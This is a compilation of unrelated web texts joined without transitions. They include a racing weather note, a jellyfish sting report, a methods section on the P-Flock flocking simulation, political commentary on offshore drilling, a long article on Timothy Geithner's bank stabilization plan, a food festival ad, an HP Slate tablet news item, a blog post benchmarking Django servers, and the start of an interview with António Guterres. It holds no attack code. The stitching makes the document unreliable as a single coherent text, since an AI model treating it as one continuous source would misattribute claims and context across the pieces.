The combination of ambient / track temperature plus a moderate breeze will readily clear any dampness that might arise from light showers , so on current forecast expectations I expect nothing other than slick tyres being employed during both sessions unless the circuit catches an isolated heavier downpour .
Unlikely , but possible !
After being stung she was unconscious for half an hour .
She suffered burn - like lashes to her legs and was put into an induced coma when she reached hospital .
But after six weeks of treatment , she was able to go home .
We developed an agent - based model of the emergence of coordinated movement in a group and implemented it in the simulation program P - Flock 2.0 , which was written in C and Delphi and run in Windows .
Both the model and the computer program are continuations of previous work on the modelling and simulation of spatial behaviour in groups ( Beltran , Salas & Quera 2006 ; Quera , Beltran , Solanas , Salafranca & Herrando 2000 ; Quera , Solanas , Salafranca , Beltran & Herrando 2000 ) .
In the current model , agents adapt their movements locally through repeated interactions as they encounter other agents ; adaptation is accomplished by applying local rules to reward the agents ' movements that fulfil their predictions , and to penalize those that do not .
As a result , under certain conditions , these dyadic adaptations lead to the emergence of coordinated movement in the group , a global phenomenon that is not specified in the local rules .
A snapshot of a simulation with the P - Flock 2.0 program is shown in Figure 1 . Figure 1 . Snapshot of a P - Flock simulation with 50 agents , showing their positions and headings in a toroidal world .
At time unit 1,600 , a loose flock emerged ; the program detected a possible leader ( agent 39 , shown in yellow ) .
Agents with different perceptual features ( see below ) are displayed using different colours .
A flocking index time series is displayed in the bottom section ( see below ) .
World and Agents
The agents move in a two - dimensional , discrete world that is either toroidal or closed .
The world is composed of cells or patches , and one cell can be occupied by only one agent at a time .
Each agent i is identified by its coordinates ( x i ( t ) , y i ( t ) ) and heading α i ( t ) at time t .
The heading of an agent at time t is defined as the vector connecting its location at t- 1 with its location at t , and is expressed as the anti-clockwise angle between that vector and the X axis , α i ( t ) = tan - 1 [ ( y i ( t ) - y i ( t - 1 ) ) / ( x i ( t ) - x i ( t - 1 ) ) ] .
Agents have a perceptual field , which is defined as a circular sector whose centre is the agent 's current location and which is bisected by its current heading vector ; radius r i and angle θ i of the circular sector are the depth and scope of agent i's perceptual field , respectively , and are the model parameters that can be modified ( see Figure 2 ) .
Agent movement is restricted to its current local neighbourhood of cells ; Moore or Von Neumann neighbourhoods can be defined with several possible diameters ( see Figure 3 ) .
Figure 2 .
An agent 's coordinates at times t- 1 and t , its heading α i ( t ) , and its perceptual field ( in white ) , defined by radius r i and angle θ i .
Figure 3 . Moore and Von Neumann neighbourhoods and possible diameters .
The agent 's current position is indicated by a black square , and its current movement is limited by its neighbourhood .
Ideal Distances and Dissatisfaction
A matrix of ideal distances among the agents is also defined .
The ideal distance from agent i to agent j at t , D ij ( t ) , is the distance at which agent i wants to be from agent j at that time ; ideal distances are not necessarily symmetrical .
As agents encounter other agents , their ideal distances can change as a function of the outcome of their interaction .
Agents ' local goal is to minimize their dissatisfaction and to that end they can move within their current neighbourhood ; an agent 's dissatisfaction at time t , U i ( t ) , is defined as a composite function of the absolute differences between its ideal distance from every other agent that it currently perceives and the real distance from them : ( 1 ) where d ij ( t ) is the Euclidean distance from agent i to agent j at t , d ij ( t ) = [ ( x i ( t ) - x j ( t ) ) 2 + ( y i ( t ) - y j ( t ) ) 2]1/2 ( 2 ) and the sum is for all the agents currently perceived by agent i at t ( subset Z i ( t ) ) .
The sum is divided by the diameter of the world , or the maximum possible real distance ( m ) , and by the cardinal number of Z i ( t ) ; dissatisfaction therefore has to be between 0 and 1 ( for details , see Quera , Beltran , Solanas , Salafranca & Herrando 2000 ) .
The maximum possible real distance is a function of the size and shape of the world ; for a rectangular world of size H × V , m = [ H2 + V2 ] 1/ 2 if it is non toroidal , and m = ( [ H2 + V2] 1/2 ) / 2 if it is toroidal .
At time t , agent i estimates its ideal or possible future dissatisfaction for time t+1 for all candidate positions p within its current neighbourhood , by computing the distances from them to the current positions of the agents it is perceiving : ( 3 ) where d ijp ( t ) is the real distance from position p within agent i's neighbourhood to agent j's position at time t ( see Figure 4 ) .
Agent i then decides to move to that position within its neighbourhood for which it estimated U ' ip ( t+1 ) to be the lowest value .
If several positions share the minimum ideal dissatisfaction , the agent decides on the move that requires the least change to its current heading .
At time t+1 , the other agents could also have moved , and therefore the ideal dissatisfaction that agent i estimated for time t+1 might not necessarily have been attained .
At each time unit the agents make the decision to move within their respective neighbourhoods simultaneously and independently .
However , if two or more neighbourhoods overlap , then some of the cells in those neighbourhoods can be candidates for more than one agent if they happen to provide the minimum dissatisfaction for all of them .
At each time unit , agents ' priorities to move are sorted randomly .
The agents with lower priorities will then only be able to move to those cells not chosen by agents with higher priorities that provide less than the minimum dissatisfaction .
Figure 4 .
How an agent estimates its possible dissatisfaction at a given time .
For every candidate position within its current neighbourhood ( in this example , a Moore neighbourhood with a diameter of 3 and nine candidate positions ) , agent 1 computes the real distances from itself to the current positions of the other agents it perceives .
These real distances are compared with the ideal distances as per the Equation 3 and a dissatisfaction is obtained for each candidate position .
Flock Synthesis Rules
In this model , ideal distances between agents vary as a consequence of the outcomes of their interactions , according to a set of reward rules , which we call Flock Synthesis Rules ( FSRs ) because a flock may emerge when they are applied locally , massively and repeatedly .
Initially , agent i moves at random without considering any other agents ; when it perceives agent j for the first time and their real distance apart is less than or equal to a critical value , P D , the FSRs for agent i are activated with regard to agent j , and the ideal distance from agent i to agent j is set so it is equal to a uniform random value between d ij , their current real distance apart , and m , the maximum possible real distance .
From that time on , ideal distance D ij undergoes two different kinds of change : smooth change and abrupt change .
A smooth change is caused by agent i when it adapts to agent j's movements .
As mentioned above , at each time step , agents i and j move to the positions in their respective current neighbourhoods that minimize their dissatisfaction .
Before moving ( time t- 1 ) , agent i predicted that its real distance from agent j at time t would be d' ij ( t ) , assuming that agent j would not move .
After moving , agent i evaluates the difference between its prediction , d' ij ( t ) , and its previous real distance from agent j , d ij ( t - 1 ) : c ij ( t ) = d' ij ( t ) - d ij ( t - 1 ) ( 4 )
From the point of view of agent i , its movement was an " attempt to approach " agent j if c ij ( t ) < 0 , or an " attempt to move away " from agent j if c ij ( t ) >
0 . After moving , agent i also evaluates the discrepancies between the current real distance , d ij ( t ) , the predicted distance , d' ij ( t ) , and the ideal distance it wanted to keep from agent j , D ij ( t - 1 ) : u ij ( t ) = |d ij ( t ) - D ij ( t - 1 ) | - | d ' ij ( t ) - D ij ( t - 1 ) | ( 5 ) which is in fact the difference between the two partial dissatisfactions for agent i with respect to agent j : the actual one and the one it predicted it would have before moving .
If u ij ( t ) = 0 , we can say that agent i has momentarily adapted to agent j , because the dissatisfaction it expected is fulfilled ; if u ij ( t ) < 0 , agent i " overadapted " to agent j , because the dissatisfaction after moving is less than expected ; and if u ij ( t ) > 0 , agent i " underadapted " to agent j , because the dissatisfaction after moving is greater than expected .
The ideal distance from agent i to agent j is increased if agent i either attempted to approach and underadapted ( c ij ( t ) < 0 and u ij ( t ) >
0 ) or attempted to move away and overadapted ( c ij ( t ) > 0 and u ij ( t ) < 0 ) ; in the first case , increasing the ideal distance can be seen as a penalty , as the attempted approach was excessive , while in the second case , it can be seen as a reward , as the attempted move away was successful .
On the other hand , the ideal distance is decreased if agent i either attempted to approach and overadapted ( c ij ( t ) < 0 and u ij ( t ) < 0 ) or attempted to move away and underadapted ( c ij ( t ) > 0 and u ij ( t ) > 0 ) ; in the first case , decreasing the ideal distance can be seen as a reward , as the attempted approach was successful , while in the second case , it can be seen as a penalty , as the attempted move away was excessive .
Finally , the ideal distance either remains the same if agent i momentarily adapted ( u ij ( t ) = 0 ) , or it is randomly increased or decreased if agent i overadapted or underadapted but attempted neither to approach or move away ( c ij ( t ) = 0 and u ij ( t ) ≠ 0 ) .
Change in the ideal distance at time t is thus : D ij ( t ) = ( 1 + kP C ) D ij ( t - 1 ) ( 6 ) where P C is a parameter of the model that modulates the rate of change ( 0 < P C < 1 ) , and k = +1 , 0 , or - 1 , for increase , no change and decrease , respectively ( see Table 1 and Figure 5 ) .
Table 1 : Decision Table for the Flock Synthesis Rules Underadapted
u ij ( t ) > 0 Adapted
u ij ( t ) = 0 Overadapted
u ij ( t ) < 0
Attempt to approach
c ij ( t ) < 0 Increase ( k = 1 )
Penalty
No change ( k = 0 ) Decrease ( k = - 1 )
Reward
No attempted move
c ij ( t ) = 0 Random
Increase or Decrease No change ( k = 0 ) Random
Increase or Decrease Attempt to move away
c ij ( t ) > 0 Decrease ( k = - 1 )
Penalty
No change ( k = 0 ) Increase ( k = 1 )
Reward Figure 5 .
An example of agent i adapting to agent j and updating its ideal distance .
The agents ' positions are indicated by green cells at the centre of their current diameter - 3 Moore neighbourhoods .
At time t- 1 , agent i decided to move to the upper left cell in its neighbourhood because it happened to provide minimum dissatisfaction ; agent i computed its real distance to agent j , d ij ( t - 1 ) ( shown in green ) , and the distance it predicted for time t , assuming that agent j would not move , d' ij ( t ) ( shown in red ) .
At time t , both agents moved ( as indicated by the brown arrows , which are the agents ' current headings ) and the real distance between them is d ij ( t ) ( shown in blue ) .
Agent i's ideal distance to agent j at t- 1 , D ij ( t - 1 ) , is shown in brown .
As c ij ( t ) = d ' ij ( t ) - d ij ( t - 1 ) > 0 , agent i attempted to move away from agent j .
As |d ij ( t ) - D ij ( t - 1 ) | < | d' ij ( t ) - D ij ( t - 1 ) | , u ij ( t ) < 0 , and agent i ( slightly ) overadapted to agent j when it moved .
Consequently , agent i's movement with respect to agent j is rewarded and the ideal distance is increased by factor P C .
An abrupt change in the ideal distance from agent i to agent j occurs when that distance remains constant or changes cyclically in small amounts at consecutive time steps for a certain period of time S ij ( T ) , T being the number of times the abrupt change occurred .
This reflects agent i's tolerance towards being ' stagnated ' with respect to agent j , i.e. remaining stable or relatively stable with respect to it .
Initially , S ij ( 1 ) = P S , which is a parameter of the model .
When the tolerance limit is reached , the ideal distance is increased abruptly by a factor equal to P C · S ij ( T ) , i.e. D ij ( t ) = D ij ( t - 1 ) + P C S ij ( T ) ( 7 ) and it remains constant for the next E ij ( T ) time units , where E ij ( T ) is agent i's tolerance for being ' exiled ' from agent j and T is the number of times the exile occurred .
Initially , E ij ( 1 ) = P E , which is a parameter of the model .
By increasing agent i's ideal distance from agent j abruptly when it stagnates , agent i is given an opportunity to adapt to new situations while it is exiled from agent j .
When the exile time is over , the ideal distance is decreased abruptly by a factor equal to P C · S ij ( T ) + P D , i.e. D ij ( t ) = D ij ( t - 1 ) - ( P C S ij ( T ) + P D ) ( 8 ) and agent i resumes the smooth change phase with respect to agent j .
Every time T that agent i is exiled with respect to agent j , its tolerance to stagnation is increased slightly by factor P C : S ij ( T ) = ( 1 + P C ) S ij ( T - 1 ) ( 9 ) and every time it resumes the smooth change phase , its tolerance to exile is decreased slightly by that same factor : E ij ( T ) = ( 1 - P C ) E ij ( T - 1 ) ( 10 )
Thus , agent i progressively adapts to agent j by tolerating longer stagnation and shorter exile periods from it .
The model parameters are listed in Table 2 .
Table 2 : Parameters of the Flock Synthesis Rules P D Critical real distance at which the FSRs are activated P C Change rate ( 0 < P C < 1 ) for increasing and decreasing ideal distances , and stagnation and exile tolerance times P S Initial value of the stagnation tolerance time P E Initial value of the exile tolerance time
It should be noted that the model does not require every agent to interact with every other agent .
That is , whenever agent i perceives agent j , only the FSRs for i towards j are activated .
Agent j may never have perceived i , or certain pairs of agents may never have perceived each other .
Thus , repeated application of the dyadic FSRs make the group move in a coordinated way , even if some , or many , of the agents never interacted with each other .
We must stress that , even if an agent perceives several agents simultaneously , the FSRs are applied in a dyadic and independent way .
That is , if at time t agent i perceives agents j 1 , j 2 , and j 3 , the FSRs are independently applied three times , for agent i towards j 1 , j 2 , and j 3 , respectively ; the decision for agent i towards j 1 resulting from Table 1 has no effect on the decision for agent i towards j 2 , and so on .
The pseudocode of the main functions of the P - Flock program is shown in the Appendix .
The C code includes specific functions ( not shown there ) for computing Euclidean distances on a toroidal surface and agent dissatisfaction , and for checking which agents perceive other agents at every simulation step .
The program reads a parameters file , performs the simulations , and saves the agents ' coordinates , headings , ideal distances , and flocking and leadership indices ( see below ) to a text file .
The simulation can then be played , paused , slowed down and played backwards ( e.g. Figure 1 ) .
P - Flock 2.0 runs on Windows and can be downloaded from http://www.ub.edu/gcai/
( go to download in the main menu ) .
A demo video can also be downloaded from that web site .
Edward Stourton discusses the religious and ethical news of the week .
Moral arguments and perspectives on stories , both familiar and unfamiliar .
For indispensable reporting on the coronavirus crisis , the election , and more , subscribe to the Mother Jones Daily newsletter .
Drill , baby , drill :
The Obama administration is proposing to open vast expanses of water along the Atlantic coastline , the eastern Gulf of Mexico and the north coast of Alaska to oil and natural gas drilling , much of it for the first time , officials said Tuesday .
….
The proposal is intended to reduce dependence on oil imports , generate revenue from the sale of offshore leases and help win political support for comprehensive energy and climate legislation .
I guess this makes me a bad environmentalist , but I ’ve never really had a big problem with opening up these offshore tracts as long as ( a ) the affected states are OK with it and ( b ) oil companies do n’t get sweetheart deals .
But here ’s what I do n’t get .
When it comes to energy , conservatives are crazy about two things : nuclear power and offshore drilling .
Now Obama has agreed to both .
But does he seriously think this will “ help win political support for comprehensive energy and climate legislation ” ?
Would n’t he be better off holding this stuff in reserve and negotiating it away in return for actual support , not just hoped - for support ?
What am I missing here ?
In the history of product launches , the rollout of the Obama Administration ’s plan to stabilize the financial system was in the category of “ Ishtar , ” smokeless cigarettes , and New Coke .
On February 10th of last year , the newly appointed Treasury Secretary , Timothy F. Geithner , appeared in the Treasury ’s Cash Room to outline proposals that would relieve banks of toxic assets , force them to undergo stress tests , and provide relief for struggling homeowners .
Immediately after Geithner ’s speech , the Dow fell sharply , and it closed the day down 382 points .
Critics from all quarters dismissed Geithner ’s plan as vague and inadequate .
“ Has Barack Obama ’s presidency already failed ? ” Martin Wolf , the Financial Times ’ influential economics commentator , wrote .
“ In normal times , this would be a ludicrous question .
But these are not normal times . ”
“ We saved the economy , but we kind of lost the public , ” Geithner said .
Illustration by Barry Blitt
In the ensuing weeks , the Dow dropped below 6,500 , and other indicators of financial stress , such as the interest rate that banks charge one another , rose , pointing to continued skepticism about Geithner ’s plan .
Commentators from Paul Krugman and Joseph Stiglitz on the left to Alan Greenspan and Lindsey Graham on the right called on the authorities to seize control and restructure the most troubled banks , which were widely believed to be insolvent .
“ I understand that once in a hundred years this is what you do , ” Greenspan told an interviewer .
Adam S. Posen , a senior fellow at the Peterson Institute for International Economics , said to the Times , “ Putting it off only brings more troubles and higher costs in the long run . ”
At a lengthy White House meeting last March , Lawrence Summers , the head of the National Economic Council , pressed Geithner and his aides on whether nationalization was now the least bad option .
Geithner held his ground , arguing that rushing to take over salvageable financial institutions would be irresponsible and economically damaging .
In the end , Summers and the President agreed with him .
But his stilted public performances , together with his reluctance to take a populist line on other issues , such as Wall Street bonuses , led to demands for his resignation — calls that have continued into his second year in office .
From across the political spectrum , critics have accused him of kowtowing to Wall Street and failing to hold to account those responsible for the financial crisis .
On the anniversary of Geithner ’s disastrous speech , the Treasury issued a two - page briefing paper hailing the achievements of the stabilization plan , which much of the media ignored .
“ A year later , there ’s still a lot to criticize , ” David Wessel , the economics editor of the Wall Street Journal , wrote , noting that the unemployment rate remains close to ten per cent and that banks are paying generous bonuses to their staff but remain reluctant to lend to small businesses .
And yet — whisper it softly — there is good news about the financial system and the roundly loathed bank bailout , the seven - hundred - billion - dollar relief package that Congress approved in October , 2008 .
During the past ten months , U.S. banks have raised more than a hundred and forty billion dollars from investors and increased the reserves they hold to cover unforeseen losses .
While many small banks are still in peril , their larger brethren , such as Bank of America , Wells Fargo , and Goldman Sachs , are more strongly capitalized than many of their international competitors , and they have repaid virtually all the money they received from taxpayers .
Looking ahead , the Treasury Department estimates the ultimate cost of the financial - rescue package at just a hundred and seventeen billion dollars — and much of that related to propping up General Motors and Chrysler .
Barring something unexpected , the bailout will end up costing taxpayers less than the savings - and - loan implosion of the early nineteen - nineties .
The government could conceivably end up making money .
Wessel is right , of course , that the unemployment rate remains stubbornly high — the rise in long - term joblessness is particularly worrying — but other economic trends are pointing up .
Although some businesses are struggling to get bank financing , municipalities , car buyers , and students again have access to credit .
Consumption and exports are rising .
Corporations are once more spending money on software and machinery .
Meanwhile , it looks as though the Senate may be finally preparing to vote on an overhaul of financial regulation .
Economists are still debating what it was that ended the financial crisis and turned the economy around .
It is inarguable , though , that Geithner ’s stabilization plan has proved more effective than many observers expected , this one included .
“ The policy worked , ” Brad Hintz , a top- rated financial analyst at the research firm Sanford C. Bernstein , said .
“ Now , did it raise the mob to come after the bankers and politicians and try and drag them off to the guillotine ?
Certainly it did .
That ’s part of the political price that is being paid for the policy having worked . ”
A few weeks ago , during a blizzard that deposited several feet of snow on Washington , I met Geithner in his office .
Dressed casually in bluejeans and snow boots , he seemed to have largely given up hope of convincing the public that the financial - rescue plan was well calibrated , but he insisted that it had been necessary .
“ My basic view is that we did a pretty successful job of putting out a severe financial crisis and avoiding a Great Depression or Great Deflation type of thing , ” he said .
“ We saved the economy , but we kind of lost the public doing it . ”
When President Obama came to office , the Bush Administration had already committed two hundred and thirty billion dollars of taxpayers ’ money to big banks — a policy that Geithner , as president of the New York Federal Reserve Bank , helped to enact .
During the transition , he warned the incoming President that more “ repugnant ” actions would be necessary to shore up the financial system and restore economic growth .
( In the first three months of 2009 , G.D.P. declined at an annual rate of 6.4 per cent . )
“ We knew it would be politically costly , but not nearly as costly as if we had n’t got it right , ” Geithner said to me of the financial stabilization plan .
“ And we did n’t think we had other options available that were credible . ”
The new Administration offered a threefold policy response .
Through the American Recovery and Reinvestment Act of 2009 , which President Obama signed into law on February 17th , Congress approved a $ 787 - billion stimulus program , consisting of roughly equal amounts of tax cuts , new spending projects , and increased financial aid to states and individuals affected by the recession .
A month later , the Federal Reserve , which had already introduced a series of emergency lending programs for distressed financial institutions and reduced the short - term interest rate to near zero , announced that it would purchase up to a trillion dollars ’ worth of Treasury bonds and mortgage securities — a move designed to bring down long - term interest rates , particularly for mortgages .
Geithner ’s Financial Stability Plan was the third piece of this policy triad , and it consisted of several elements .
Initially , the most widely discussed was the establishment of two public - private investment funds that would buy toxic assets and troubled loans from banks .
The Treasury Department and private investors would provide equal amounts of capital for these funds , and other arms of the government would furnish them with hefty loans to scale up their purchases to as much as a trillion dollars .
This Public - Private Investment Program — which echoed an earlier idea from Henry Paulson , Geithner ’s predecessor as Treasury Secretary — set off a heated debate , with many commentators describing it as a giveaway to Wall Street .
If the new funds did well , the private investors would share equally in the gains ; if the funds fared badly , the government would assume most of the losses .
In the end , banks were reluctant to sell their assets to the government for prices that would have forced them to recognize losses , and the public - private funds invested less than thirty billion dollars .
( Geithner still insists that the idea was a good one . )
As things turned out , the far more significant part of Geithner ’s plan was the bank stress tests , which the Treasury and the Fed carried out in March and April of last year .
The stated aim of these tests was to figure out whether individual banks were strong enough to survive a severe recession .
Government officials simulated a number of economic scenarios , involving successively higher rates of loan defaults , to see if the banks had enough capital to withstand losses .
Undercapitalized banks would have to issue more stock to investors , or , if they could n’t manage that , accept more government funding and more government control .
At first , some people on Wall Street feared that the Obama Administration was simply seeking a pretext for taking over embattled firms like Citigroup and Bank of America , as liberal Democrats had urged .
But Geithner was resolutely opposed to such an option , at least at that stage .
He and Ben Bernanke , the Fed chairman , intended to use the stress tests to bolster banks ’ finances rather than nationalizing them .
“ That would have been a deeply transforming policy mistake , ” he said to me .
“ The country would have suffered for decades .
We ’d have spent hundreds of billions of dollars more that we did n’t need to spend , and would have been stuck in those institutions for years . ”
Other critics dismissed the tests as a sham , arguing that the economic assumptions underpinning them were too benign .
As the tests unfolded , however , it became evident that the government ’s loss projections were quite high , and that many banks would be forced to raise considerable sums of money — in some cases , more than ten billion dollars .
“ When people did the math , they said , ‘ This is for real , ’ ” Mark Zandi , the chief economist and co-founder of Moody ’s Analytics , recalled .
“ That went for the banks , too .
They complained that they did n’t need to raise all of this capital . ”
In fact , some commentators agreed that the Treasury and the Fed were being too tough on banks .
( Stock issues dilute existing stockholders and reduce earnings per share . )
One of these skeptics was Richard Bove , an analyst at Rochdale Securities , who has been following the financial industry since 1965 .
He has since changed his mind .
“ Geithner recognized that the system needed overkill on security and soundness to rebuild the confidence that was lacking , ” he said .
According to Bove ’s calculations , U.S. banks now have more capital as a percentage of assets than in any year since 1935 .
“ He built in that safety and soundness throughout the industry .
As time goes on , I ’m getting more and more respect for him . ”
Between March 9th and May 7th , when the results of the stress tests were announced , the Dow rose by almost two thousand points , and the spread between AAA and BAA bonds — a reliable indicator of financial distress — fell sharply .
Other factors contributed to this revival : the decline in house prices slowed ; the Fed began buying mortgage bonds ; Congress started to disburse funds from the stimulus program ; and the U.S. accounting authorities granted banks more leeway in writing down their assets .
From abroad , the Group of Twenty nations agreed on a range of policies to fight the global slump .
But the stress tests surely played an important role in reassuring investors that the banking system was n’t about to collapse .
During our conversation , Geithner compared the effect of the tests to the banking holiday that F.D.R. introduced in March , 1933 , to stem a financial panic .
In January and February last year , Geithner recalled , there was an undifferentiated “ run ” by bank creditors .
Nobody , not even the banks , knew which firms might be saddled with heavy losses , and there was a general reluctance to extend money to financial institutions .
The stress tests “ allowed people to differentiate , ” Geithner said .
“ They could decide who deserved capital and who did n’t . ”
Once the banking panic had ended , the economy , like a patient recovering from a coronary arrest , began to take some hesitant steps forward .
Between July and September of 2009 , G.D.P. grew at an annual rate of 2.2 per cent , and in the fourth quarter of the year the pace of expansion accelerated to 5.9 per cent .
Despite a recovery in demand for their products , many firms chose to increase output by working their existing employees harder ; some continued to cut payroll , and until this winter the unemployment rate rose steadily .
But a “ jobless recovery ” is nonetheless a recovery of sorts .
At this time last year , most economists saw the economy contracting throughout 2009 .
Without a successful stabilization of the banking system , even a modest recovery would have been inconceivable .
Still , some economists insist that nationalization would have produced an even better outcome .
“ While the Obama Administration had avoided the conservatorship route , what it did was far worse than nationalization : it is ersatz capitalism , the privatizing of gains and the socializing of losses , ” Joseph Stiglitz , a Columbia economist who served in the Clinton Administration , writes in his new book , “ Freefall : America , Free Markets , and the Sinking of the World Economy . ”
Stiglitz goes on , “ The government response has set the economy on a path to recovery that will be slower and more difficult than need be . ”
“ Let me know if I ’m going too fast for you . ”
Facebook
Twitter
Email
Shopping
Stiglitz could be right — since history happens only once , there is no way to know for sure .
But his argument raises several issues .
Contrary to widespread belief , the Obama Administration never ruled out nationalization ; it simply made it a policy of last resort .
Last April , at an off - the - record dinner at the Brookings Institution , Larry Summers was confronted by a number of economists who believed that the financial crisis would not end unless the government took over stricken banks .
Summers told the critics that if they were proved right in the following months the Administration would move toward nationalization , and the wait would exact some cost to the economy .
But if they were wrong and the Administration moved now it would be like amputating limbs that might instead be saved with strong medicine .
“ Today , with all of the major financial institutions having a market capitalization of more than a hundred billion dollars and the economy growing again , the judgment not to nationalize but to put an enormous emphasis on raising private capital looks to have been effective , ” Summers told me a couple of weeks ago .
“ I think the critics were wrong , and that Tim ’s leadership helped us avoid a lot of things that could have been very damaging . ”
The experience of other countries that have taken over banks , such as Sweden , Norway , and the United Kingdom , shows that it can be done quite effectively .
Northern Rock , which the British government nationalized in February , 2008 , is operating fairly well .
Conceivably , the U.S. government could have seized control of some big banks , forced them to boost lending more rapidly , and , eventually , split them into pieces and sold them off , thus alleviating the too - big - to - fail problem .
“ It would have been temporary ownership and genuine restructuring , ” Robert Kuttner , the author of the forthcoming book “ A Presidency in Peril , ” said .
“ You would have had more money going out to the rest of the economy sooner , and you would have had an honest accounting for losses .
The problem with doing what we did , kicking the can down the road , is that you have these wounded institutions that are very parsimonious with credit , and , even today , nobody knows what their real state is . ”
Created and presented by Hamilton , Burlington , Oakville , Halton , Brant , Haldimand , Lake Erie North Shore , Pelee Island , Prince Edward County , Niagara Peninsula and Niagara - On - The - Lake 's most popular restaurants , culinary experts , chefs , innovative food trucks , breweries and wineries .
Come and experience an exciting variety of Ontario VQA and international wines , spirits , craft beers , local gourmet food , specialty coffees , teas , decadent desserts and more , all while helping to support a great local initiative , Food for Life !
Also , enjoy entertaining live musical acts and fun informative cooking demonstrations all in one convenient and central location !
The Apple iPad 's Oscar debut on millions of TVs may have been the talk of the town Monday morning , but not for long .
Rival PC maker HP has launched a sneak attack on the iPad .
HP released a video introducing its tablet called the Slate that will run Windows 7 operating system and support Flash – a jab at the iPad , which will not display Flash - based sites or videos .
" With this slate product , you ’re getting a full web browsing experience in the palm of your hand , " posted Phil McKinney , vice president and chief technology officer for HP 's personal system group on the company 's blog .
" No watered - down internet , no sacrifices . "
HP did not reveal pricing or availability for the device , though it has indicated the Slate will be available this year .
Since the announcement of Apple 's iPad in January , PC makers are rushing to offer tablet devices that can position themselves between the 4 - inch touchscreen smartphone and the 12 - inch netbook or laptop .
They say tablets could be ideal for web surfing , checking e-mail , reading e-books and viewing personal media while sitting on a couch .
Dell has said that it will launch a family of tablets , the first of which will be a PlayStation Portable - sized device with a 5 - inch screen codenamed Dell Mini 5 .
Dell has n't disclosed pricing or availability for its product yet .
Apple 's iPad starting at $ 500 will go on sale April 3 .
Though HP has not released the specs yet , the company 's video shows a device that 's closer to the 9.7 - inch display iPad in its design and size .
HP 's slate seems to offer a full capacitive touchscreen and the familiar pinch - to - zoom gesture .
Overall , the design resemblance to the iPad is startling , so the Slate could clearly be a tablet for those who want an iPad - like device on the Windows ecosystem .
The Slate has icons that lets users quickly access the browser and apps such as Pandora and the music player .
And like the iPad , it will also display digitized versions of magazines and newspapers .
HP 's video also shows the Slate running a video from MTV , a web - based game designed in Flash , photo- editing tools and a digital version of The New York Times .
As for pricing , McKinney says HP could have released a slate two years ago , but it would have cost around $ 1,500 .
" Since then , chip and screen advancements have given us the ability to create a product that can hit a size , weight , battery life and price point that will make this product a mainstream offering , " he wrote .
Photo / Video : HP Slate ( HP )
Mind that age !
This blog post is 10 years old !
Most likely , its content is outdated .
Especially if it 's technical .
uwsgi is the latest and greatest WSGI server and promising to be the fastest possible way to run Nginx +
Django .
Proof here But !
Is it that simple ?
Especially if you 're involving Django herself .
So I set out to benchmark good old threaded fcgi and gunicorn and then with a source compiled nginx with the uwsgi module baked in I also benchmarked uwsgi .
The first mistake I did was testing a Django view that was using sessions and other crap .
I profiled the view to make sure it would n't be the bottleneck as it appeared to take only 0.02 seconds each .
However , with fcgi , gunicorn and uwsgi I kept being stuck on about 50 requests per second .
Why ?
1/0.02 = 50.0 !!!
Clearly the slowness of the Django view was thee bottleneck ( for the curious , what took all of 0.02 was the need to create new session keys and putting them into the database ) .
So I wrote a really dumb Django view with no sessions middleware enabled .
Now we 're getting some interesting numbers :
fcgi ( threaded ) 640 r/s fcgi ( prefork 4 processors ) 240 r/s ( *) gunicorn ( 2 workers ) 1100 r/s gunicorn ( 5 workers ) 1300 r/s gunicorn ( 10 workers ) 1200 r/s ( ?!? ) uwsgi ( 2 workers ) 1800 r/s uwsgi ( 5 workers ) 2100 r/s uwsgi ( 10 workers ) 2300 r/s (* this made my computer exceptionally sluggish as CPU when through the roof )
If you 're wondering why the numbers appear to be rounded it 's because I ran the benchmark multiple times and guesstimated an average ( also obviously excluded the first run ) .
Misc notes
For gunicorn it did n't change the numbers if I used a TCP ( e.g. 127.0.0.1:9000 ) or a UNIX socket ( e.g. /tmp/wsgi.sock )
On the upstream directive in nginx it did n't impact the benchmark to set fail_timeout=0 or not .
or not .
fcgi on my laptop was unable to fork new processors automatically in this test so it stayed as 1 single process !
Why ?!!
when you get more than 2,000 requests / second the benchmark itself and the computer you run it on becomes wobbly .
I managed to get 3,400 requests / second out of uwsgi but then the benchmark started failing requests .
These tests were done on an old 32 bit dual core Thinkpad with 2 Gb RAM :(
uwsgi was a bitch to configure .
Most importantly , who the hell compiles source code these days when packages are so much much more convenient ?
( Fry - IT hosts around 100 web servers that need patching and love )
Why would anybody want to use sockets when they can cause permission problems ?
TCP is so much more straight forward .
changing the number of ulimits to 2048 did not improve my results on this computer
gunicorn is not available as a Debian package :(
Adding too many workers can actually damage your performance .
See example of 10 workers on gunicorn .
I did not bother with mod_wsgi since I do n't want to go near Apache and to be honest last time I tried I got really mysterious errors from mod_wsgi that I ran away screaming .
Conclusion
gunicorn is the winner in my eyes .
It 's easy to configure and get up and running and certainly fast enough and I do n't have to worry about stray threads being created willy nilly like threaded fcgi .
uwsgi definitely worth coming back to the day I need to squeeze few more requests per second but right now it just feels to inconvenient as I can't convince my sys admins to maintain compiled versions of nginx for the little extra benefit .
Having said that , the day uwsgi becomes available as a Debian package I 'm all over it like a dog on an ass - flavored cookie .
And the " killer benefit " with gunicorn is that I can predict the memory usage .
I found , on my laptop : 1 worker = 23 Mb , 5 workers = 82 Mb , 10 workers = 155 Mb and these numbers stayed like that very predictably which means I can decide quite accurately how much RAM I should let Django ( ab) use .
UPDATE :
Since this was publish we , in my company , have changed all Djangos to run over uWSGI .
It 's proven faster than any alternatives and extremely stable .
We actually started using it before it was merged into core Nginx but considering how important this is and how many sites we have it 's not been a problem to run our own Nginx package .
Hail uWSGI !
Voila !
Now feel free to flame away about the inaccuracies and what multitude of more wheels and knobs I could / should twist to get even more juice out .
Related posts
Interview : António Guterres
As High Commissioner for refugees at the United Nations , António Guterres monitors the safety , security , and well being of the some 10.5 million refugees in the world today .
And though that figure is down by 8 percent from 2009 , thanks mostly to returns and changes of status among the displaced from Iraq and Colombia , the challenge it poses is still enormous .
Now , as he comes to the end of his five - year term , Guterres reflects on fast - changing situations in Sudan , Iraq , and Afghanistan .
" Conflicts are not getting better , " he tells Foreign Policy ‘s Elizabeth Dickinson .
Excerpts :
Foreign Policy :
You just got back from the Central African Republic ( CAR ) , a country caught in the middle of the continent , amid conflicts in Sudan , Chad , and the Democratic Republic of the Congo ( DRC ) .
What did you see ?
António Guterres : CAR represents the most ignored and forgotten human tragedy in the world .
It ’s not the biggest human tragedy in the world — DRC , for instance , presents a bigger tragedy — but I believe the number of people aware of its existence is very small .
CAR is a country of 4 million inhabitants , bigger than France and Belgium , in which you have about 200,000 people displaced .
And you have a very complex governance problem .
The truth is that half of the territory of the country is completely lawless , and it ’s becoming an international problem .
